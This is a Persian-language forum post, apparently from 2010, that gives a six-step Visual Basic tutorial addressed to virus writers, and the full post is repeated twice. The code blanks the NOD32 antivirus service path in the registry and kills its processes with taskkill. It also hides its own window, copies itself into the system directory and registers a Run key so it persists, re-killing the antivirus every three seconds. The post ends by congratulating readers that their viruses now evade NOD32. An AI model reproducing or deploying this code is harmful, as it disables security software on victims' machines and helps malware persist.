atena-ati
12th August 2010, 07:03 PM
در ابتدا باید عرض کنیم که از همه دوستانی که در بخش آنتی فعالیت میکنم پوزش میخوام که خلاف جهت اونها حرکت میکنم!!
یکی از دغدغه های تمایی کسانی که میخوان ویروس نویسی کنن اینه که آنتی ویروس خیلی سریع ویروس اونا رو شناسایی میکنه و از بین میبره
حالا واسه این مشکل چندتا راه حل وجود داره اینکه از پچر استفاده کنید که یه خورده قدیمی شده و دیگه کاربردی چندانی نداره و راه حلی که من پیشنهاد میکنم اینه که آنتی ویروس رو از کار بندازید . . . . http://www.p30i.com/forum/images/smilies/yahoo/13.gif ولی خدایی از من نشنیده بگیرین !!!
شروع میکنیم
برای این کار باید 6 مرحله را بگذرانید:
1-ویژوال بیسیک را اجرا کنید.standard exe را انتخاب و یک command و یک timer هم به form اضافه کنید و interval timer هم برابر 3000 قرار دهید.
2-روی form دو بار کلیک کنید و کدهای زیر را درونش وارد کنید:
n = 30
App.TaskVisible = False
If App.Path = SysDir Then
Me.Hide
App.TaskVisible = False
Command1_Click
End If
3-روی command دو بار کلیک کنید و کدهای زیر را درونش کپی کنید:
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Services\NOD32krn", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet001\Services\NOD32krn ", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet002\Services\NOD32krn ", "ImagePath", ""
SaveString HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run ", "AntiNod32", SysDir & "\antinod32.exe"
Shell "taskkill /f /im NOD32KRN.EXE", vbHide
Shell "taskkill /f /im NOD32KUI.EXE", vbHide
If App.Path <> SysDir Then
MsgBox "Nod32 Anti Virus Disabled Successfull !", vbInformation, "Anti Nod32"
FileCopy App.Path & "\" & App.EXEName & ".exe", SysDir & "\" & "antinod32.exe"
End If
4-در قسمت general فرم کد زیر را وارد کنید:
Dim n As Integer
5-در مرحله آخر،روی timer دوبار کلیک کنید و کدهای زیر را وارد کنید:
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Services\NOD32krn", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet001\Services\NOD32krn ", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet002\Services\NOD32krn ", "ImagePath", ""
SaveString HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run ", "AntiNod32", SysDir & "\antinod32.exe"
Shell "taskkill /f /im NOD32KRN.EXE", vbHide
Shell "taskkill /f /im NOD32KUI.EXE", vbHide
6-یک module درست کنید(از منوی project ) و کدهای زیر را درونش کپی کنید:
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const HKEY_CURRENT_USER = &H80000001
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal Hkey As Long) As Long
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String) As Long
Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal Hkey As Long, ByVal lpValueName As String) As Long
Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal Hkey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal Hkey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Public Const REG_SZ = 1
Public Const REG_DWORD = 4
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function SetFileAttributes Lib "kernel32" Alias "SetFileAttributesA" (ByVal lpFileName As String, ByVal dwFileAttributes As Long) As Long
Public Function SysDir() As String
Dim SysPath As String
SysPath = String(255, vbNullChar)
GetSystemDirectory SysPath, 255
SysDir = Left(SysPath, InStr(SysPath, vbNullChar) - 1)
End Function
Public Function exist(name As String) As Boolean
exist = (Dir(name, vbNormal Or vbReadOnly Or vbHidden Or vbSystem Or vbArchive) <> "")
End Function
Public Function GetString(Hkey As Long, strPath As String, strValue As String)
Dim keyhand As Long
Dim datatype As Long
Dim lResult As Long
Dim strBuf As String
Dim lDataBufSize As Long
Dim intZeroPos As Integer
r = RegOpenKey(Hkey, strPath, keyhand)
lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize)
If lValueType = REG_SZ Then
strBuf = String(lDataBufSize, " ")
lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize)
If lResult = ERROR_SUCCESS Then
intZeroPos = InStr(strBuf, Chr$(0))
If intZeroPos > 0 Then
GetString = Left$(strBuf, intZeroPos - 1)
Else
GetString = strBuf
End If
End If
End If
End Function
Public Sub SaveString(Hkey As Long, strPath As String, strValue As String, strdata As String)
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(Hkey, strPath, keyhand)
r = RegSetValueEx(keyhand, strValue, 0, REG_SZ, ByVal strdata, Len(strdata))
r = RegCloseKey(keyhand)
End Sub
Function SaveDword(ByVal Hkey As Long, ByVal strPath As String, ByVal strValueName As String, ByVal lData As Long)
Dim lResult As Long
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(Hkey, strPath, keyhand)
lResult = RegSetValueEx(keyhand, strValueName, 0&, REG_DWORD, lData, 4)
r = RegCloseKey(keyhand)
End Function
تبریک می گم.حالا دیگه ویروس های شما از سد آنتی ویروس nod32 هم رد میشه.[tashvigh]
منبع:http://www.p30i.com/forum/showthread.php?t=6355 (http://njavan.com/forum/redirector.php?url=http%3A%2F%2Fwww.p30i.com%2Ffor um%2Fshowthread.php%3Ft%3D6355)
یکی از دغدغه های تمایی کسانی که میخوان ویروس نویسی کنن اینه که آنتی ویروس خیلی سریع ویروس اونا رو شناسایی میکنه و از بین میبره
حالا واسه این مشکل چندتا راه حل وجود داره اینکه از پچر استفاده کنید که یه خورده قدیمی شده و دیگه کاربردی چندانی نداره و راه حلی که من پیشنهاد میکنم اینه که آنتی ویروس رو از کار بندازید . . . . http://www.p30i.com/forum/images/smilies/yahoo/13.gif ولی خدایی از من نشنیده بگیرین !!!
شروع میکنیم
برای این کار باید 6 مرحله را بگذرانید:
1-ویژوال بیسیک را اجرا کنید.standard exe را انتخاب و یک command و یک timer هم به form اضافه کنید و interval timer هم برابر 3000 قرار دهید.
2-روی form دو بار کلیک کنید و کدهای زیر را درونش وارد کنید:
n = 30
App.TaskVisible = False
If App.Path = SysDir Then
Me.Hide
App.TaskVisible = False
Command1_Click
End If
3-روی command دو بار کلیک کنید و کدهای زیر را درونش کپی کنید:
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Services\NOD32krn", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet001\Services\NOD32krn ", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet002\Services\NOD32krn ", "ImagePath", ""
SaveString HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run ", "AntiNod32", SysDir & "\antinod32.exe"
Shell "taskkill /f /im NOD32KRN.EXE", vbHide
Shell "taskkill /f /im NOD32KUI.EXE", vbHide
If App.Path <> SysDir Then
MsgBox "Nod32 Anti Virus Disabled Successfull !", vbInformation, "Anti Nod32"
FileCopy App.Path & "\" & App.EXEName & ".exe", SysDir & "\" & "antinod32.exe"
End If
4-در قسمت general فرم کد زیر را وارد کنید:
Dim n As Integer
5-در مرحله آخر،روی timer دوبار کلیک کنید و کدهای زیر را وارد کنید:
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Services\NOD32krn", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet001\Services\NOD32krn ", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet002\Services\NOD32krn ", "ImagePath", ""
SaveString HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run ", "AntiNod32", SysDir & "\antinod32.exe"
Shell "taskkill /f /im NOD32KRN.EXE", vbHide
Shell "taskkill /f /im NOD32KUI.EXE", vbHide
6-یک module درست کنید(از منوی project ) و کدهای زیر را درونش کپی کنید:
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const HKEY_CURRENT_USER = &H80000001
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal Hkey As Long) As Long
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String) As Long
Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal Hkey As Long, ByVal lpValueName As String) As Long
Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal Hkey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal Hkey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Public Const REG_SZ = 1
Public Const REG_DWORD = 4
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function SetFileAttributes Lib "kernel32" Alias "SetFileAttributesA" (ByVal lpFileName As String, ByVal dwFileAttributes As Long) As Long
Public Function SysDir() As String
Dim SysPath As String
SysPath = String(255, vbNullChar)
GetSystemDirectory SysPath, 255
SysDir = Left(SysPath, InStr(SysPath, vbNullChar) - 1)
End Function
Public Function exist(name As String) As Boolean
exist = (Dir(name, vbNormal Or vbReadOnly Or vbHidden Or vbSystem Or vbArchive) <> "")
End Function
Public Function GetString(Hkey As Long, strPath As String, strValue As String)
Dim keyhand As Long
Dim datatype As Long
Dim lResult As Long
Dim strBuf As String
Dim lDataBufSize As Long
Dim intZeroPos As Integer
r = RegOpenKey(Hkey, strPath, keyhand)
lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize)
If lValueType = REG_SZ Then
strBuf = String(lDataBufSize, " ")
lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize)
If lResult = ERROR_SUCCESS Then
intZeroPos = InStr(strBuf, Chr$(0))
If intZeroPos > 0 Then
GetString = Left$(strBuf, intZeroPos - 1)
Else
GetString = strBuf
End If
End If
End If
End Function
Public Sub SaveString(Hkey As Long, strPath As String, strValue As String, strdata As String)
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(Hkey, strPath, keyhand)
r = RegSetValueEx(keyhand, strValue, 0, REG_SZ, ByVal strdata, Len(strdata))
r = RegCloseKey(keyhand)
End Sub
Function SaveDword(ByVal Hkey As Long, ByVal strPath As String, ByVal strValueName As String, ByVal lData As Long)
Dim lResult As Long
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(Hkey, strPath, keyhand)
lResult = RegSetValueEx(keyhand, strValueName, 0&, REG_DWORD, lData, 4)
r = RegCloseKey(keyhand)
End Function
تبریک می گم.حالا دیگه ویروس های شما از سد آنتی ویروس nod32 هم رد میشه.[tashvigh]
منبع:http://www.p30i.com/forum/showthread.php?t=6355 (http://njavan.com/forum/redirector.php?url=http%3A%2F%2Fwww.p30i.com%2Ffor um%2Fshowthread.php%3Ft%3D6355)